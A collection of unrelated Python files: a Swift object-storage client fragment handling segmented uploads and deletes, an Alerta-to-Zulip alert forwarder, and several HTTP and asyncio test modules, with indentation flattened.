# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
new_slo_manifest_paths.add(seg_loc)
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
put_headers['x-static-large-object'] = 'true'
mr = {}
conn.put_object(
container, obj, manifest_data,
headers=put_headers,
query_string='multipart-manifest=put',
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
res['large_object'] = False
obr = {}
if path is not None:
content_length = getsize(path)
contents = LengthWrapper(open(path, 'rb'),
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError('Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, optional container and optional list
of objects.
:param container: The container to delete or delete from.
:param objects: The list of objects to delete.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'prefix': None,
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if container is not None:
if objects is not None:
if options['prefix']:
objects = [obj for obj in objects
if obj.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
if self._should_bulk_delete(objects):
for obj_slice in n_groups(
objects, self._options['object_dd_threads']):
self._bulk_delete(container, obj_slice, options,
obj_dels)
else:
self._per_item_delete(container, objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast']
and not res['success']):
cancelled = True
def _should_bulk_delete(self, objects):
if len(objects) < 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return False
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return False
except ClientException:
# Old swift, presumably; assume no bulk middleware
return False
swift_info = cap_result['capabilities']
return 'bulk_delete' in swift_info
def _per_item_delete(self, container, objects, options, rdict, rq):
for obj in objects:
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
conn.delete_object(container, obj, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
def _delete_object(self, conn, container, obj, options,
results_queue=None):
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_string = None
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj)
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_string = 'multipart-manifest=delete'
except ClientException as err:
if err.http_status != 404:
raise
results_dict = {}
conn.delete_object(container, obj, query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container):
results_dict = {}
try:
conn.delete_container(container, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
for res in self.delete(
container=container,
objects=[o['name'] for o in part['listing']],
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
res.update({'success': False, 'error': e})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster to retrieve capabilities.
:returns: A dictionary containing the capabilities of the cluster.
:raises: ClientException
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed to the queue
If the future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
|
alerta_client.py
|
import logging
import os
import threading
import time
from datetime import datetime, timedelta
from alertaclient.api import Client
from alertanio.config.static_config import AlertaConfiguration, topic_map
from alertanio.database import DBHelper
from alertanio.zulip_client import ZulipClient
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.DEBUG)
ALERTA_API_KEY = os.environ.get('ALERTA_API_KEY')
TIME_FILE = '/tmp/alertanio.time'
class AlertaClient:
"""Alerta client wrapper"""
_alerta: Client = None
_alerta_thread: threading.Thread
def __init__(self, db_host, db_port, db_user, db_password, environment='prod'):
self.alerta_api_key = ALERTA_API_KEY
self.db_host = db_host
self.db_port = db_port
self.db_user = db_user
self.db_password = db_password
self.environment = environment
self.load_configuration()
@property
def alerta(self):
"""Return alerta instance, create new if missing"""
if self._alerta is None:
LOGGER.warning('No alerta exist. Create client.')
self._alerta = Client(
endpoint=self.alerta_config.alerta_endpoint,
debug=self.alerta_config.alerta_debug,
timeout=self.alerta_config.alerta_timeout,
key=self.alerta_api_key
)
return self._alerta
def load_configuration(self):
"""Load/Re-Load Alerta configuration and Topics templates"""
self.db = DBHelper(
host=self.db_host,
port=self.db_port,
user=self.db_user,
password=self.db_password
)
self.db.__connect__()
self.alerta_config = AlertaConfiguration(
*self.db.get(
columns='*',
table='configuration',
condition=f"config_name='{self.environment}'")[0])
self.templates = dict(self.db.get(
columns='topic_name, template_data',
table='templates',
custom_clause='INNER JOIN topics ON templates.template_id=topics.templ_id'))
self.topics = topic_map(self.db.get(table='topics', columns='topic_name, zulip_to, zulip_subject'))
self.db.__disconnect__()
self.zulip = ZulipClient(self.templates, self.topics)
def write_last_run_time(self, time):
with open(TIME_FILE, 'w') as file:
file.write(time)
def read_last_run_time(self):
try:
with open(TIME_FILE, 'r') as file:
return file.read()
except FileNotFoundError:
return None
def start_fetching(self, auto_refresh=True, interval=5):
"""Start fetching updates from Alerta
Date format for query: 2020-05-20T11:00:00.000Z
"""
last_run = self.read_last_run_time()
while auto_refresh:
if last_run is not None:
current_time = last_run
last_run = None
else:
current_time = (datetime.utcnow() - timedelta(seconds=interval)).isoformat().split('.')[0] + '.000Z'
alerts = self.alerta.get_alerts(query=[('from-date', current_time)])
for alert in alerts:
if not alert.repeat and alert.status not in ['ack', 'blackout', 'closed']:
self.zulip.post_receive(alert)
self.write_last_run_time(current_time)
time.sleep(interval)
def start(self):
"""Start alerta"""
self._alerta_thread = threading.Thread(
target=(self.start_fetching()),
name="Alerta-Thread")
self._alerta_thread.start()
self._alerta_thread.join()
|
test_remotenotificationlog.py
|
import json
import threading
from abc import abstractmethod
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Event, Thread
from typing import Callable, List, Sequence
from unittest.case import TestCase
from uuid import UUID
from eventsourcing.interface import (
NotificationLogInterface,
NotificationLogJSONClient,
NotificationLogJSONService,
)
from eventsourcing.tests.application import BankAccounts
class TestRemoteNotificationLog(TestCase):
def test_directly(self):
client = BankAccountsJSONClient(BankAccountsJSONService(BankAccounts()))
account_id1 = client.open_account("Alice", "alice@example.com")
account_id2 = client.open_account("Bob", "bob@example.com")
# Get the "first" section of log.
section = client.log["1,10"]
self.assertEqual(len(section.items), 2)
self.assertEqual(section.items[0].originator_id, account_id1)
self.assertEqual(section.items[1].originator_id, account_id2)
# Get notifications start 1, limit 10.
notifications = client.log.select(start=1, limit=10)
self.assertEqual(len(notifications), 2)
self.assertEqual(notifications[0].originator_id, account_id1)
self.assertEqual(notifications[1].originator_id, account_id2)
def test_with_http(self):
server_address = ("127.0.0.1", 8080)
server = HTTPApplicationServer(
address=server_address,
handler=BankAccountsHTTPHandler,
)
server.start()
if not server.is_running.wait(timeout=5):
server.stop()
self.fail("Unable to start HTTPApplicationServer")
try:
client = BankAccountsJSONClient(
BankAccountsHTTPClient(server_address=server_address)
)
account_id1 = client.open_account("Alice", "alice@example.com")
account_id2 = client.open_account("Bob", "bob@example.com")
# Get the "first" section of log.
section = client.log["1,10"]
self.assertEqual(len(section.items), 2)
self.assertEqual(section.items[0].originator_id, account_id1)
self.assertEqual(section.items[1].originator_id, account_id2)
# Get notifications start 1, limit 10.
notifications = client.log.select(1, 10)
self.assertEqual(len(notifications), 2)
self.assertEqual(notifications[0].originator_id, account_id1)
self.assertEqual(notifications[1].originator_id, account_id2)
finally:
server.stop()
def test_with_http_and_threads(self):
server_address = ("127.0.0.1", 8081)
server = HTTPApplicationServer(
address=server_address,
handler=BankAccountsHTTPHandler,
)
server.start()
if not server.is_running.wait(timeout=5):
server.stop()
self.fail("Unable to start HTTPApplicationServer")
try:
self.has_errors = False
def open_account():
client = BankAccountsJSONClient(
BankAccountsHTTPClient(server_address=server_address)
)
for _ in range(30):
try:
client.open_account("Alice", "alice@example.com")
# print(threading.get_ident(), account_id1)
except Exception as e:
print(threading.get_ident(), "error:", e)
self.has_errors = True
raise
thread1 = Thread(target=open_account)
thread1.start()
thread2 = Thread(target=open_account)
thread2.start()
thread1.join()
thread2.join()
self.assertFalse(self.has_errors)
# Check the notification log.
client = BankAccountsJSONClient(
BankAccountsHTTPClient(server_address=server_address)
)
self.assertEqual(len(client.log["1,10"].items), 10)
self.assertEqual(len(client.log["11,20"].items), 10)
self.assertEqual(len(client.log["21,30"].items), 10)
self.assertEqual(len(client.log["31,40"].items), 10)
self.assertEqual(len(client.log["41,50"].items), 10)
self.assertEqual(len(client.log["51,60"].items), 10)
self.assertEqual(len(client.log["61,70"].items), 0)
self.assertEqual(len(client.log.select(start=1, limit=10)), 10)
self.assertEqual(len(client.log.select(start=11, limit=10)), 10)
self.assertEqual(len(client.log.select(start=21, limit=10)), 10)
self.assertEqual(len(client.log.select(start=31, limit=10)), 10)
self.assertEqual(len(client.log.select(start=41, limit=10)), 10)
self.assertEqual(len(client.log.select(start=51, limit=10)), 10)
self.assertEqual(len(client.log.select(start=61, limit=10)), 0)
finally:
server.stop()
class BankAccountsInterface(NotificationLogInterface):
@abstractmethod
def open_account(self, body: str) -> str:
pass
class BankAccountsJSONService(
BankAccountsInterface,
NotificationLogJSONService[BankAccounts],
):
def open_account(self, request: str) -> str:
kwargs = json.loads(request)
account_id = self.app.open_account(**kwargs)
return json.dumps({"account_id": account_id.hex})
class BankAccountsJSONClient:
def __init__(self, interface: BankAccountsInterface):
self.interface = interface
self.log = NotificationLogJSONClient(interface)
def open_account(self, full_name, email_address) -> UUID:
body = json.dumps(
{
"full_name": full_name,
"email_address": email_address,
}
)
body = self.interface.open_account(body)
return UUID(json.loads(body)["account_id"])
class HTTPApplicationServer(Thread):
prepare: List[Callable] = []
def __init__(self, address, handler):
super(HTTPApplicationServer, self).__init__(daemon=True)
self.server = HTTPServer(
server_address=address,
RequestHandlerClass=handler,
)
self.is_running = Event()
def run(self):
[f() for f in self.prepare]
self.is_running.set()
self.server.serve_forever()
def stop(self):
self.server.shutdown()
self.join()
@classmethod
def before_first_request(cls, f):
HTTPApplicationServer.prepare.append(f)
return f
class BankAccountsHTTPHandler(BaseHTTPRequestHandler):
def do_PUT(self):
if self.path.startswith("/accounts/"):
length = int(self.headers["Content-Length"])
request_msg = self.rfile.read(length).decode("utf8")
body = bank_accounts_service.open_account(request_msg)
status = 201
else:
body = "Not found: " + self.path
status = 404
self.send(body, status)
def do_GET(self):
if self.path.startswith("/notifications/"):
section_id = self.path.split("/")[-1]
body = bank_accounts_service.get_log_section(section_id)
status = 200
elif self.path.startswith("/notifications"):
args = self.path.split("?")[-1].split("&")
args = [p.split("=") for p in args]
args = {p[0]: p[1] for p in args}
start = int(args["start"])
limit = int(args["limit"])
body = bank_accounts_service.get_notifications(start=start, limit=limit)
status = 200
else:
body = "Not found: " + self.path
status = 404
self.send(body, status)
def send(self, body: str, status: int):
self.send_response(status)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(body.encode("utf8"))
class BankAccountsHTTPClient(BankAccountsInterface):
def __init__(self, server_address):
self.connection = HTTPConnection(*server_address)
def get_log_section(self, section_id: str) -> str:
return self._request("GET", "/notifications/{}".format(section_id))
def get_notifications(
self, start: int, limit: int, topics: Sequence[str] = ()
) -> str:
return self._request("GET", f"/notifications?start={start}&limit={limit}")
def open_account(self, body: str) -> str:
return self._request("PUT", "/accounts/", body.encode("utf8"))
def _request(self, method, url, body=None):
self.connection.request(method, url, body)
response = self.connection.getresponse()
return response.read().decode()
bank_accounts_service: BankAccountsInterface
@HTTPApplicationServer.before_first_request
def init_bank_accounts() -> None:
global bank_accounts_service
bank_accounts_service = BankAccountsJSONService(BankAccounts())
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = "127.0.0.1"
BASEPORT = 27600 + random.randint(1, 100)
httpclass = httpclient
# import mysolution
# httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if self.post == None:
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if self.get == None:
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host=BASEHOST, port=BASEPORT):
return http.server.HTTPServer((host, port), MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("", "utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path, "utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers["Content-Length"])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode("utf-8"))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data), "utf-8"))
def header_check(self):
response = 200
errors = []
if "Host" not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors), "utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if "Host" not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors), "utf-8"))
def post_header_check(self):
response = 200
errors = []
if "Host" not in self.headers:
response = 400
errors.append("No Host header found")
if "Content-length" not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors), "utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
"""Cache the httpd server and run it as a thread"""
if TestHTTPClient.httpd == None:
try:
self.thread = threading.Thread(target=self.run_server).start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise (e)
@classmethod
def run_server(self):
"""run the httpd server in a thread"""
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
"""Test against 404 errors"""
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST, BASEPORT))
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
"""Test against 404 errors"""
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST, BASEPORT))
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
"""Test HTTP GET"""
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
req = http.GET(url)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path) >= 0, "Data: [%s] " % req.body)
def testGETHeaders(self):
"""Test HTTP GET Headers"""
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
req = http.GET(url)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
"""Test HTTP POST Headers"""
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
req = http.POST(url)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200, "Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
"""Test HTTP Get in the wild, these webservers are far less
forgiving"""
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org",
]
for url in urls:
try:
req = http.GET(url)
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue(False, "An Exception was thrown for %s %s" % (url, e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(
req.code == 200 or req.code == 301 or req.code == 302,
"Code: %s for %s" % (req.code, url),
)
if req.code == 200:
self.assertTrue(
req.body.find("DOCTYPE") >= 0 or req.body.find("<body") >= 0,
"%s Data: [%s] " % (url, req.body),
)
def testPOST(self):
"""Test HTTP POST with an echo server"""
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
args = {
"a": "aaaaaaaaaaaaa",
"b": "bbbbbbbbbbbbbbbbbbbbbb",
"c": "c",
"d": "012345\r67890\n2321321\n\r",
}
print("Sending POST!")
req = http.POST(url, args=args)
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if TestHTTPClient.httpd != None:
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST, BASEPORT))
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == "__main__":
unittest.main()
|
test_utils.py
|
"""Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
from test import support
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
@coroutine
def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = 2
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__),
'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
context = ssl.SSLContext()
context.load_cert_chain(certfile, keyfile)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
